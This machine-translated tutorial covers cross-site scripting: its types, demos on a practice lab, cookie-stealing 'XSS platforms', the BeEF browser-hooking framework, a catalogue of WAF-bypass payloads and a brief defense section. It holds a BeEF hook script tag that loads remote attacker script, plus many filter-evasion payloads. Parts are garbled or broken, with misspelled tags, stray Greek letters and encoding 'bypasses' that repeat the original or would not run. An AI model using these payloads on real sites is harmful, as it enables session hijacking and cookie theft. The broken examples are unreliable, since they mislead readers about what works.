Detailed explanation of xss attack
- 1 XSS detailed explanation
- 2 XSS platform
- 3 Beef tools
- 4 WAF bypass
- 5 xss defense
1 XSS detailed explanation
1.1 Introduction to xss
XSS attacks usually refer to exploiting vulnerabilities left during web development and injecting malicious instruction code into web pages through clever methods, allowing users to load and execute web programs maliciously created by attackers. These malicious web programs are usually JavaScript, but can also include Java, VBScript, ActiveX, Flash or even plain HTML. After a successful attack, the attacker may obtain various contents including but not limited to higher permissions (such as performing some operations), private web content, sessions, cookies, etc.
1.2 xss principle
The main reason for XSS vulnerabilities is that the program does not strictly control the input and input, resulting in the constructed malicious code being entered and being parsed and executed as a valid code during front-end browsing, thus causing harm.
1.3 xss hazards
XSS mainly has the following hazards:
1) Phishing, stealing various user accounts.
2) Steal the user’s cookie information to obtain the user’s private information.
3) Pop up the advertising page to obtain relevant benefits.
4) Hijack user sessions and perform arbitrary operations.
5) Spread worm viruses.
1.4 xss generation and mining
1.4.1 XSS occurrence process
For example: <input type="text" name="address1" value="value1from">
When the user input is not the normal input content, but enters a string of codes: "/><script>alert(document.cookie)</script>.
becomes: <input type="text" name="address1" value=""/><script>alert(document.cookie)</script>"> and the code will be executed.
1.4.2 xss mining
Reference link:XSS attack details
1.4.2.1 Black box testing
By finding all places where the user can input and control the output to the page code, such as: parameters in the URL, URL links, forms, input boxes, comment areas, personal information modifications, etc.
High risk: comment area, message area, personal information modification, order information, etc.
Medium risk: site letters, communications, private messages, feedback, etc.
Low risk: search box, URL, image attributes, etc.
1.4.2.2 White box testing
The code audit for XSS mainly starts from the place where parameters are received and some keywords.
Common ways to receive parameters in PHP are G E T , _GET, GET, _POST, $_REQUEST, etc. can search all places that receive parameters. Then track the received data to see if it is output to the page, and then see if the data output to the page has been filtered and HTML encoded.
Of course, you can also search for output statements like echo to track where the output variables come from. Can we control it? If it is taken from the database, can we control what is stored in the database? Whether the data is filtered before being stored in the database, etc.
Most programs will uniformly call functions that receive parameters encapsulated in public files. We need to audit these public functions to see if they are filtered, whether they can be bypassed, etc.
1.5 xss classification
According to the form of XSS vulnerabilities, they can be divided into: reflection type, storage type, and DOM type.
1.5.1 Reflective type
1.5.1.1 Principle
Reflected XSS uses the content entered by the user as code to be executed by the browser to achieve the purpose of attack. Generally, it is necessary to lure the user to visit a URL constructed by the attacker. This type of attack occurs on the client and requires access to a specially crafted URL with malicious parameters, so it is also called non-persistent XSS.
1) The attacker constructs a URL containing a malicious string and sends it to the victim.
2) The attacker induces the victim to initiate this URL request.
3) The website introduces this malicious string in the response.
4) The victim's browser executes the malicious script in the response and sends the victim's cookie information to the attacker's server.
1.5.1.2 Attack position
User login portal, website search box, etc.
1.5.1.3 Case
What needs to be noted here is that there is a limit length value in this submission box. You can click on the submission box and then right-click to check and increase the value. Then enter <script>alert(1)</script> in the input box and click Submit.
Of course, you can actually observe the URL here. In fact, when you click the button without inputting anything, message=&submit=submit will appear, and the message is followed by the content we entered. If you don’t want to modify the limit length, you need to refresh the limit length. Reset, then you can modify it directly on the URL, and finally it is http://192.168.10.150/pikachu/vul/xss/xss_reflected_get.php?message=&submit=submit
1.5.2 Storage type
1.5.2.1 Principle
Stored XSS is to embed the attack script permanently in a certain page. When the user accesses it, the execution will be triggered, and the user will be subject to related attacks. And this type of attack mainly occurs on the server side. All users who visit this page will be subject to corresponding attacks, so it is also called persistent XSS.
1) The attacker uses a form on the website to insert malicious strings into the website database.
2) The victim requests a page from the website.
3) The website introduces a malicious string in the response and sends it to the victim.
4) The victim's browser executes the malicious script in the response and sends the victim's cookies to the attacker's server.
1.5.2.2 Attack position
˜Interactive areas such as forums, blogs, message boards, and comment areas.
1.5.2.3 Case
After entering <script>alert(1)</script> in the comment area, click the submit button.
It will be executed automatically the next time you visit the page. It will be executed first and then jump to the normal interface.
1.5.3 DOM type
1.5.3.1 Principle
DOM, the full name of Document Object Model, is an interface independent of platform and programming language. It allows programs or scripts to dynamically access and update document content, structure and style, and the processed results can become part of the display page. Since DOM-type XSS does not interact with the backend server, it is a problem that occurs when the front-end code is output through DOM operations. Most of them are reflective.
1) The attacker constructs a URL containing a malicious string and sends it to the victim.
2) The attacker induces the victim to initiate this URL request.
3) The website received the request, but did not introduce the malicious string in the response.
4) The victim's browser executes the legitimate script in the response, causing the malicious script to be inserted into the page.
5) The victim's browser executes the malicious script inserted into the page and sends the victim's cookie information to the attacker's server.
1.5.3.2 Attack position
DOM-based XSS vulnerabilities do not require interaction with the server. It only occurs when the client processes data.
1.5.3.3 Case
When the front-end interacts, close it to form a new tab, thereby realizing XSS pop-up windows.
1.6 Common tags for XSS attacks
1.6.1 <scirpt>
Example:<scirpt>alert("xss");</script>
1.6.2 <img>
Triggered when there is an error in loading the image
Example: <img src="x" onerror=alert(1)>
Triggered when the mouse pointer moves to the element
Example: a><img src=1 onmouseover="alert(1)">
Triggered when the mouse pointer moves out
Example:<img src=1 onmouseout="alert(1")>
1.6.3 <a>
Example:<a href="http://www.qq.com">qq</a>
Example:<a href=javascript:alert('1')>test</a>
1.6.4 <input>
Trigger when a key is pressed
Example: <input type="text" onkeydown="alert(1)">
Trigger when a key is pressed
Example: <input type="text" onkeypress="alert(1)">
Triggered when the button is released
Example: <input type="text" onkeyup="alert(1)">
Competing for focus, thus triggering the onblur event
Example: < /span><input onblur=alert("xss") autofocus><input autofocus>
1.6.5 <style>
Example:<style οnlοad=alert(1)></style>
2 XSS platform
2.1 Introduction to XSS platform
Since the various payload statements of XSS are relatively complex to construct, generally the payload automatically generated by the XSS platform is used to obtain relevant cookies. However, when using the XSS platform, you also need to pay attention to whether there are other malicious codes on the platform. At the same time, when you test a certain website, information will be sent to the platform, and the platform will know about this vulnerability, so you still need to pay attention.
As for the XSS platform, there are many XSS platforms on the Internet, so I won’t recommend them here.
2.2 XSS platform usage
2.2.1 Register XSS platform
When you find an XSS platform, just register it. Of course, you also need to pay attention to security.
2.2.2 Create project
2.2.2.1 Create project name
Click My Project on the left and create, enter the project name and project description in the interface, and then take the next step.
2.2.2.2 Create project type
Select the project type you want and check it, then click Configure.
It should be noted that there may be some that cannot be used. If you cannot obtain it multiple times, there may be configuration problems or interception. It is also possible that the project cannot be used.
2.2.2.3 View code
There will be a view code in the upper right corner. Once you enter it, you can insert the generated code into the location of the XSS vulnerability you discovered. When someone visits it later, the XSS platform will receive relevant information.
Of course, there are many optional configuration items in the XSS platform, all of which can be tested. But in short, the same sentence remains. Since the XSS platform was built by others, when you perform XSS testing, not only you will get the cookie value, but the managers of the XSS platform can also get the cookie value, so you need to pay attention. If it is for internal testing, try not to use the XSS platform. You can build an XSS platform yourself. If you want to test the location on the public network, you need to have a public network address if you build your own XSS platform. There are many details on how to build an XSS platform on Baidu.
2.2.2.4 Case Flash pop-up phishing
Click Configuration in the project, find Flash pop-up phishing, and enter the jump URL. The URL entered here is Baidu’s URL. Note that the URL needs to be entered completely, such as: https://www.baidu.com. Then click Configure.
Then check the code, copy the generated code, and insert it into the xss vulnerability location.
You can use the code to test the following. Use the reflection type in pikachu. If you use the storage type and need to delete it later, if it is troublesome, use the reflection type to test it. You can see a flash pop-up window and click to upgrade and it will jump to the Baidu page.
3 Beef tools
3.1 Introduction to Beef tool
BeEF is currently the most powerful browser open source penetration testing framework. It uses X55 vulnerabilities in conjunction with JS scripts and Metasploit for penetration; BeEF is written based on the Ruby language and supports a graphical interface, making it simple to operate.
The new version of kail no longer comes with the beef tool, you need to download it yourself. And currently only supports macos and Linux systems.
3.2 Beef tool installation
It is recommended to update the source before installing the Beef tool to avoid errors.
apt-get update
apt-get install beef-xss
Of course it will be slower when updating the source, so you can Do other things for the time being, and when the update is complete, you can install the beef tool.
3.3 Beef tool startup
Start: beef-xss
Turn off: beef-xss-stop
3.4 BeefWEB login
Login address: http://ip:3000/ui/panel.
Account password: beef/beef
If you set a password when you first started beef, then the password will be the login password you set, and the account will still be beef.
3.5 Beef case test
3.5.1 Inserting construction code
Insert<script src="http://192.168.10.20:3000/hook.js"></script> code into the stored xss of pikache shooting range.
3.5.2 Target drone online
By looking at the Beef tool, the relevant information of the target drone has been obtained.
3.5.3 Pop-up window test
In the create Alert Dialog (pop-up window) of "Hooked Domain" under "Brower", enter the content you want to pop up in the alert txt, and then execute it.
Pop-up effect
4 WAF bypass
4.1 Case bypass
html is not case sensitive, you can use case to confuse the past.
Example:
<script>alert(“xss”);</script>
Replacement:
<ScRipt>ALeRt(“XSS”);</sCRipT>
4.2 Double-write bypass
In some specific cases there may be a keyword filter, you can try to use double-writing to bypass it.
Example:
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
Replace on in the above with nothing.
<input oonnfocus="alert('xss');">
4.3 Space and Enter to bypass TAB
Since js usually ends with a semicolon, the semicolon can be ignored when a complete statement is parsed and there is a newline character at the end of the line. If the parsing determines that it is not a complete statement, processing will continue until the statement ends or a semicolon appears. .
4.3.1 Space bypass
Example:
<img src="javascript:alert('xss');">
Replacement:
<img src="java script:alert('xss');">
4.3.2 Enter to bypass
Example:
<img src="javascript:alert('xss');">
Replacement:
<img src="java script: alert('xss');">
4.3.3 TAB bypass
Example:
<img src="javascript:alert('xss');">
Replacement:
<img src="javasc ript:alert('xss');">
4.4 Comment bypass
Example:
<script>alert()</script>
Replacement:
<scri<!--1-->pt>alert()</sc<!--1-->ript>
4.5 Character splicing
Using eval: eval is a built-in function in Javascript that is used to calculate the value of a string expression.
Example:
<img src="x" onerror="a=aler;b=t;c='(xss);';eval(a+b+c)">
Using top
Example:
<script>top["al"+"ert"](xss);</script>
4.6 Encoding bypass
4.6.1 Unicode encoding bypass
Example:
<img src="javascript:alert('xss');">
Replacement:
<img src="javascript:alert('xss');">
4.6.2 URL encoding bypass
Example:
<img src="javascript:alert('xss');">
Replacement:
<img src="javascript:%61%6C%65%72%74%28%22%78%73%73%22%29%3B;">
4.6.3 ascii code bypass
Example:
<img src="javascript:alert('xss');">
Replacement:
<img src="javascript:97,108,101,114,116,40,34,120,115,115,34,41,59">
4.6.4 base64 bypass
Example:
<img src="javascript:alert('xss');">
Replacement:
<img src="javascript:YWxlcnQoJ3hzcycpOw==">
4.7 Filter URL bypass
4.7.1 URL encoding bypass
Example:
<img src="x" onerror=document.location= 'http://www.baidu.com/'>
Replacement:
<img src="x" onerror=document.location='http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/'>
4.7.2 IP Bypass
4.7.2.1 Decimal
Example:
<img src="x" onerror=document.location= 'http://www.baidu.com/'>
Replacement:
<img src="x" onerror=document.location='http://2130706433/'>
4.7.2.2 Octal system
Example:
<img src="x" onerror=document.location= 'http://www.baidu.com/'>
Replacement:
<img src="x" onerror=document.location='http://0177.0.0.01/'>
4.8 Filter double quotes and single quotes
If it is in an html tag, we can do without quotation marks. If it is in js, we can use backticks instead of single and double quotes
Example:
<img src="x" onerror=alert('xss');>
Replacement:
<img src="x" onerror=alert(xss);>
4.9 JavaScript pseudo-protocol bypass
The way to add JavaScript code to the client is to place it in the URL after the pseudo-protocol specifier javascript:. This special protocol type declares that the body of the URL is arbitrary JavaScript code, which is run by the JavaScript interpreter. If the javascript code in the javascript:URL contains multiple statements, these statements must be separated by semicolons.
javascript:var now = new Date(); "<h1>The time is:</h1>" + now;
JavaScript URLs can also contain JavaScript statements that only perform actions but do not return values. javascript:alert(“hello world!”)
4.9.1 <a>标签
&emsp Description:
<a>标签定义超链接,用于从一个页面链接到另一个页面。
<a>元素最重要的属性是href属性,它指定链接的目标。
Example:
<a href="javascript:alert(xss);">xss</a>
4.9.2 Tags
Explanation:
<img> 标签定义 HTML 页面中的图像
<img> 标签有两个必需的属性:src 和 alt
Example:
<img src=javascript:alert('xss')>//IE7以下
4.10 Bypassing encyclopedia links
Link: Comprehensive list of XSS attack bypass filtering methods
5 xss defense
The overall idea: filter the content input by the user and the URL visited, and encode the output content. Simply put, it means filtering all the content submitted by the user, excluding keywords and sensitive content, and also carrying out certain parameters on the URL. Filter, and html-encode the content dynamically output to the page and convert it into html entities so that the malicious code input by the user cannot be executed in the browser.
5.1 Content filtering
˜Filtering its content can be divided into whitelist and blacklist filtering.
5.1.1 Whitelist filtering
Whitelist filtering filters out content that is allowed to be released. In this case, it can indeed basically eliminate many XSS attacks, but in real environments, it may cause false interceptions.
5.1.2 Blacklist filtering
Blacklist filtering is to intercept related keywords. Blacklist input may eliminate large XSS attacks, but there is still the possibility of being bypassed.
5.2 http only attribute
Set the HTTP only attribute of the session cookie on the server so that the client JS script cannot obtain the cookie information.
5.3 Explicit input content
Clear the type of content input by users, such as personal information phone numbers, numbers, passwords, email addresses, etc., and filter out some inappropriate content.
5.4 Input content length control
Length limits should be imposed on untrusted content. For example, if a phone number has 11 digits, then set it to 11 digits. Although it cannot prevent XSS attacks 100%, it can increase the difficulty of implementing XSS attacks.
5.5 Security measures
Add verification code, enable relevant protection software, WAF software and hardware.